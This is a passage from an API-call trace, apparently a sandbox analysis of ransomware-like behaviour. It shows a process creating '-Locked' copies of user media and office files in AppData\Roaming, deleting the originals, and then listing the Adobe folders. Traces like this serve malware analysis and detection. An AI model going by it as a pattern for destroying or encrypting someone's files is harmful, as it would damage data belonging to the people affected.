"c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mlwz3 5b.flv-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0308.538] GetFileType (hFile=0x4a0) returned 0x1 [0308.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.538] GetFileType (hFile=0x4a0) returned 0x1 [0308.540] CloseHandle (hObject=0x4a0) returned 1 [0308.541] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MlwZ3 5B.flv", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MlwZ3 5B.flv", lpFilePart=0x0) returned 0x32 [0308.541] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MlwZ3 5B.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mlwz3 5b.flv")) returned 1 [0308.553] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MSKdXWbMNdBdxPo0.png-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MSKdXWbMNdBdxPo0.png-Locked", lpFilePart=0x0) returned 0x41 [0308.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.554] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MSKdXWbMNdBdxPo0.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mskdxwbmndbdxpo0.png-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0308.554] GetFileType (hFile=0x4a0) returned 0x1 [0308.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.554] GetFileType (hFile=0x4a0) returned 0x1 [0308.560] CloseHandle (hObject=0x4a0) returned 1 [0308.561] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MSKdXWbMNdBdxPo0.png", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MSKdXWbMNdBdxPo0.png", lpFilePart=0x0) returned 0x3a [0308.561] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MSKdXWbMNdBdxPo0.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mskdxwbmndbdxpo0.png")) returned 1 [0308.585] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\oxMLhE1-J 5hfFEY8z.mkv-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\oxMLhE1-J 5hfFEY8z.mkv-Locked", lpFilePart=0x0) returned 0x43 [0308.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.586] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\oxMLhE1-J 5hfFEY8z.mkv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\oxmlhe1-j 5hffey8z.mkv-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0308.586] GetFileType (hFile=0x4a0) returned 0x1 [0308.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.587] GetFileType (hFile=0x4a0) returned 0x1 [0308.588] CloseHandle (hObject=0x4a0) returned 1 [0308.589] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\oxMLhE1-J 5hfFEY8z.mkv", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\oxMLhE1-J 5hfFEY8z.mkv", lpFilePart=0x0) returned 0x3c [0308.589] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\oxMLhE1-J 5hfFEY8z.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\oxmlhe1-j 5hffey8z.mkv")) returned 1 [0308.647] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\pSmOfjTm1Z7Y.xls-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\pSmOfjTm1Z7Y.xls-Locked", lpFilePart=0x0) returned 0x3d [0308.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.647] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\pSmOfjTm1Z7Y.xls-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\psmofjtm1z7y.xls-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0308.648] GetFileType (hFile=0x4a0) returned 0x1 [0308.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.648] GetFileType (hFile=0x4a0) returned 0x1 [0308.650] CloseHandle (hObject=0x4a0) returned 1 [0308.650] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\pSmOfjTm1Z7Y.xls", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\pSmOfjTm1Z7Y.xls", lpFilePart=0x0) returned 0x36 [0308.650] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\pSmOfjTm1Z7Y.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\psmofjtm1z7y.xls")) returned 1 [0308.718] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\rL3Qp_tDR-lwqAu8ivr6.png-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\rL3Qp_tDR-lwqAu8ivr6.png-Locked", lpFilePart=0x0) returned 0x45 [0308.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.718] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\rL3Qp_tDR-lwqAu8ivr6.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\rl3qp_tdr-lwqau8ivr6.png-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0 [0308.719] GetFileType (hFile=0x4a0) returned 0x1 [0308.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.719] GetFileType (hFile=0x4a0) returned 0x1 [0308.721] CloseHandle (hObject=0x4a0) returned 1 [0308.721] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\rL3Qp_tDR-lwqAu8ivr6.png", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\rL3Qp_tDR-lwqAu8ivr6.png", lpFilePart=0x0) returned 0x3e [0308.722] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\rL3Qp_tDR-lwqAu8ivr6.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\rl3qp_tdr-lwqau8ivr6.png")) returned 1 [0308.863] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\rwqHIkEdYEi_jog.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\rwqHIkEdYEi_jog.mp4-Locked", lpFilePart=0x0) returned 0x40 [0308.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.863] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\rwqHIkEdYEi_jog.mp4-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\rwqhikedyei_jog.mp4-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0308.865] GetFileType (hFile=0x484) returned 0x1 [0308.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.865] GetFileType (hFile=0x484) returned 0x1 [0308.868] CloseHandle (hObject=0x484) returned 1 [0308.869] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\rwqHIkEdYEi_jog.mp4", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\rwqHIkEdYEi_jog.mp4", lpFilePart=0x0) returned 0x39 [0308.869] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\rwqHIkEdYEi_jog.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\rwqhikedyei_jog.mp4")) returned 1 [0308.872] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\sixqoI0m.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\sixqoI0m.xlsx-Locked", lpFilePart=0x0) returned 0x3a [0308.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.872] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\sixqoI0m.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\sixqoi0m.xlsx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0308.873] GetFileType (hFile=0x484) returned 0x1 [0308.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.873] GetFileType (hFile=0x484) returned 0x1 [0308.875] CloseHandle (hObject=0x484) returned 1 [0308.875] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\sixqoI0m.xlsx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\sixqoI0m.xlsx", lpFilePart=0x0) returned 0x33 [0308.876] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\sixqoI0m.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\sixqoi0m.xlsx")) returned 1 [0308.948] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\v4hZ-TlKltopmm.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\v4hZ-TlKltopmm.mp4-Locked", lpFilePart=0x0) returned 0x3f [0308.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.948] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\v4hZ-TlKltopmm.mp4-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\v4hz-tlkltopmm.mp4-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0308.949] GetFileType (hFile=0x484) returned 0x1 [0308.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.949] GetFileType (hFile=0x484) returned 0x1 [0308.951] CloseHandle (hObject=0x484) returned 1 [0308.952] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\v4hZ-TlKltopmm.mp4", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\v4hZ-TlKltopmm.mp4", lpFilePart=0x0) returned 0x38 [0308.952] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\v4hZ-TlKltopmm.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\v4hz-tlkltopmm.mp4")) returned 1 [0308.967] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\yUlO-j d6_Ha.pps-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\yUlO-j d6_Ha.pps-Locked", lpFilePart=0x0) returned 0x3d [0308.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.967] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\yUlO-j d6_Ha.pps-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\yulo-j d6_ha.pps-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0308.967] GetFileType (hFile=0x484) returned 0x1 [0308.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.968] GetFileType (hFile=0x484) returned 0x1 [0308.969] CloseHandle (hObject=0x484) returned 1 [0308.970] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\yUlO-j d6_Ha.pps", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\yUlO-j d6_Ha.pps", lpFilePart=0x0) returned 0x36 [0308.970] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\yUlO-j d6_Ha.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\yulo-j d6_ha.pps")) returned 1 [0308.975] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZSAFh.swf-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZSAFh.swf-Locked", lpFilePart=0x0) returned 0x36 [0308.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.975] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZSAFh.swf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\zsafh.swf-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0308.976] GetFileType (hFile=0x484) returned 0x1 [0308.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.976] GetFileType (hFile=0x484) returned 0x1 [0308.979] CloseHandle (hObject=0x484) returned 1 [0308.980] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZSAFh.swf", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZSAFh.swf", lpFilePart=0x0) returned 0x2f [0308.980] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ZSAFh.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\zsafh.swf")) returned 1 [0308.980] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\_KBh2MkVK-1OboakSPw0.mkv-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\_KBh2MkVK-1OboakSPw0.mkv-Locked", lpFilePart=0x0) returned 0x45 [0308.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0308.981] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\_KBh2MkVK-1OboakSPw0.mkv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\_kbh2mkvk-1oboakspw0.mkv-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x484 [0308.981] GetFileType (hFile=0x484) returned 0x1 [0308.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0308.981] GetFileType (hFile=0x484) returned 0x1 [0309.029] CloseHandle (hObject=0x484) returned 1 [0309.030] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\_KBh2MkVK-1OboakSPw0.mkv", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\_KBh2MkVK-1OboakSPw0.mkv", lpFilePart=0x0) returned 0x3e [0309.030] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\_KBh2MkVK-1OboakSPw0.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\_kbh2mkvk-1oboakspw0.mkv")) returned 1 [0309.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0309.083] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe", lpFilePart=0x0) returned 0x2b [0309.083] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\", lpFilePart=0x0) returned 0x2c [0309.083] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.084] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.084] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0309.084] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 0 [0309.084] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0309.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0309.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0309.085] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe", lpFilePart=0x0) returned 0x2b [0309.085] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\", lpFilePart=0x0) returned 0x2c [0309.085] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.085] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.086] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0309.086] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0309.086] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0309.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0309.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af140) returned 1 [0309.086] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player", nBufferLength=0x105, lpBuffer=0x1aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player", lpFilePart=0x0) returned 0x38 [0309.087] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\", nBufferLength=0x105, lpBuffer=0x1aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\", lpFilePart=0x0) returned 0x39 [0309.088] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x1aee68 | out: lpFindFileData=0x1aee68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.088] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.088] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 1 [0309.091] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 